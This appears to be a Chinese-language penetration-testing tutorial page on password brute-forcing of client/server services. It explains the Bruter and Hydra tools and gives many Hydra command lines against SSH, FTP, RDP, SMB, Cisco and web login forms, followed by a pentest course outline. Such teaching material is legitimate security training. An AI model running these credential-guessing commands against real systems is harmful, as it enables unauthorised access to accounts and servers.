[TOC]
## CS架構暴力猜解
指軟件,數據庫,操作系統,3389相關的破解。C/S 即客戶端/服務器,基于 C/S 架構的應用程序 如 ssh ftpsql-server mysql 等,
這些服務往往提供一個高權限的用戶,使用這些高權限的用戶能在很大程度上給開發人員帶來方便,但如果口令被破解帶來的危害也是相當大的。
C/S 架構主要使用的破解工具 Hydra、Bruter、X-scan
### window下建議使用bruter
使用步驟:
1. 添加地址,選擇協議,端口
2. 添加用戶名
linux默認用戶名一般是root,windows是administrator
3. 選擇字典
注意不支持中文目錄
也可以不用字典,用自帶功能的字符組合方式
4. 開始
### Linux下建議使用hydra
該軟件kali自帶,也可以自己下載安裝,注意hydra-gtk是有圖形化界面的,命令行或圖形化都可以
hydra 是著名黑客組織 thc 的一款開源的暴力密碼破解工具,可以在線破解多種密碼。官網:http://www.thc.org/thc-hydra
kail 密碼字典
```
/usr/share/wfuzz/wordlist/others/names.txt
/usr/share/wfuzz/wordlist/others/common_pass.txt
```
#### hydra參數:
```sh
hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns][-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT]
-R 繼續從上一次進度接著破解。
-S 采用 SSL 鏈接。
-s PORT 可通過這個參數指定非默認端口。
-l LOGIN 指定破解的用戶名,對特定用戶破解。
-L FILE 指定用戶名字典。
-p PASS 小寫,指定密碼破解,少用,一般是采用密碼字典。
-P FILE 大寫,指定密碼字典。
-e ns 可選選項,n:空密碼試探,s:使用指定用戶和密碼試探。一般都是加上的
-C FILE 使用冒號分割格式,例如“登錄名:密碼”來代替-L/-P 參數。
-M FILE 指定目標列表文件一行一條。
-o FILE 指定結果輸出文件。
-f ,找到第一對登錄名或者密碼的時候中止破解。
-t TASKS 同時運行的線程數,默認為 16。
-w TIME 設置最大超時的時間,單位秒,默認是 30s。
server 目標 ip
service 指定服務名,如telnet ftp pop3 smb smbnt mssql mysql snmp 等
```
#### 使用舉例
破解ssh
```sh
hydra -L users.txt -P password.txt -t 1 -vV -e ns 192.168.1.8 ssh
#破解成功,直接顯示結果。也可以使用 -o 選項指定結果輸出文件。
hydra -L users.txt -P password.txt -t 1 -vV -e ns -o save.log 192.168.1.104 ssh
```
常規用法匯總
```sh
#1.破解 ssh:
hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns ip ssh
hydra -l 用戶名 -p 密碼字典 -t 線程 -o save.log -vV ip ssh
#2.破解 ftp:
hydra ip ftp -l 用戶名 -P 密碼字典 -t 線程(默認 16) -vV
hydra ip ftp -l 用戶名 -P 密碼字典 -e ns -vV
#3.get方式提交,破解 web 登錄:
hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns ip http-get /admin/
hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns -f ip http-get /admin/index.php
#4.post 方式提交,破解 web 登錄:
hydra -l 用戶名 -P 密碼字典 -s 80 ip http-post-form "/admin/login.php:username =^USER^&password=^PASS^&submit=login"
(說明:http-post-form 表示破解是采用 http 的 post 方式提交的表單密碼破解,<title>中的內容是表示錯誤猜解的返回信息提示。)
#5.破解 https:
hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https
#6.破解 teamspeak:
hydra -l 用戶名 -P 密碼字典 -s 端口號 -vV ip teamspeak
#7.破解 cisco設備:
hydra -P pass.txt 10.36.16.18 cisco
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable
#8.破解 smb:
hydra -l administrator -P pass.txt 10.36.16.18 smb
#9.破解 pop3:
hydra -l muts -P pass.txt my.pop3.mail pop3
#10.破解 rdp:
hydra ip rdp -l administrator -P pass.txt -V
#11.破解 http-proxy:
hydra -l admin -P pass.txt http-proxy://10.36.16.18
#12.破解 imap:
hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
```
## 暴力破解工具選擇
>對于爆破軟件的選擇,主要看速度,穩定性,支持的協議數
>這款暴力密碼破解工具相當強大,支持幾乎所有協議的在線密碼破解,
>其密碼能否被破解關鍵在于字典是否足夠強大。
- src導航站
- kali和msf
- 信息收集
- 收集域名信息
- Whois 查詢
- 備案信息查詢
- 信用信息查詢
- IP反查站點的站
- 瀏覽器插件
- 收集子域名信息
- 在線平臺
- 工具枚舉
- ssl與證書透明度
- DNS歷史解析
- DNS域傳送漏洞
- C段探測
- JS文件域名&ip探測
- 搜索引擎&情報社區
- google黑客
- 威脅情報
- 鐘馗之眼
- 收集相關應用信息
- 微信公眾號&微博
- APP收集&反編譯
- 收集常用端口信息
- 常見端口&解析&總結
- 掃描工具
- 網絡空間引擎搜索
- 瀏覽器插件
- nmap掃描
- 收集敏感信息
- 源碼泄露
- 郵箱信息收集
- 備份文件泄露
- 目錄&后臺掃描
- 公網網盤
- 歷史資產
- 指紋&WAF&CDN識別
- 指紋識別
- CDN識別
- 繞過CDN查找真實IP
- WAF識別
- 漏洞資源和社工
- 漏洞公共資源庫
- 社會工程
- 資產梳理
- 各種對滲透有幫助的平臺
- 掃描器
- 掃描器對比
- AppScan(IBM)_web和系統
- AWVS_web掃描
- X-Scan_系統掃描
- WebInspect_HP_WEB
- Netsparker_web
- WVSS_綠盟_web
- 安恒明鑒
- Nessus_系統
- nexpose_系統
- 啟明天鏡_web_系統
- SQL注入
- 常用函數
- sql注入步驟
- union注入和information_schema庫
- 函數和報錯注入
- SQL盲注
- 其他注入方式
- 防止SQL注入解決方案
- Access數據庫注入
- MSSQL數據庫注入
- MYSQL數據庫注入
- 神器SQLmap
- xss跨站腳本攻擊
- xss原理和分類
- xss案例和修復
- xss繞過技巧
- xss案例
- 文件上傳下載包含
- 常有用文件路徑
- 文件上傳漏洞
- 文件下載漏洞
- 文件包含漏洞
- upload-labs上傳漏洞練習
- XXE、SSRF、CSRF
- SSRF原理基礎
- SSRF案例實戰
- CSRF原理基礎
- CSRF案例及防范
- XXE之XML_DTD基礎
- XXE之payload與修復
- XXE結合SSRF
- 遠程命令執行與反序列化
- 遠程命令和代碼執行漏洞
- 反序列化漏洞
- 驗證碼與暴力破解
- 爆破與驗證碼原理
- CS架構暴力破解
- BS架構暴力破解
- WEB編輯器漏洞
- 編輯器漏洞基礎
- Ewebeditor編輯器
- FCKeditor編輯器
- 其他編輯器
- web中間件漏洞
- 中間件解析漏洞
- Tomcat常見的漏洞總結
- Jboss漏洞利用總結
- Weblogic漏洞利用總結
- WEB具體步驟
- 旁注和越權
- CDN繞過
- 越權與邏輯漏洞
- WEB應用常見其他漏洞
- WEB登陸頁面滲透思路
- 獲取WEBshell思路
- 社工、釣魚、apt
- 社工和信息收集
- 域名欺騙
- 釣魚郵件
- 一些釣魚用的掛馬工具
- 代碼審計
- 代碼審計工具
- WAF繞過
- WAF基礎及云WAF
- 各種WAF繞過方法
- 繞過WAF上傳文件
- 系統提權
- windows系統提權
- linux系統提權
- 數據庫提權操作系統
- 內網橫向滲透
- 內網穿透方式
- 一些內網第三方應用提權
- ARP與DOS
- ARP欺騙
- DOS與DDOS
- 一些DOS工具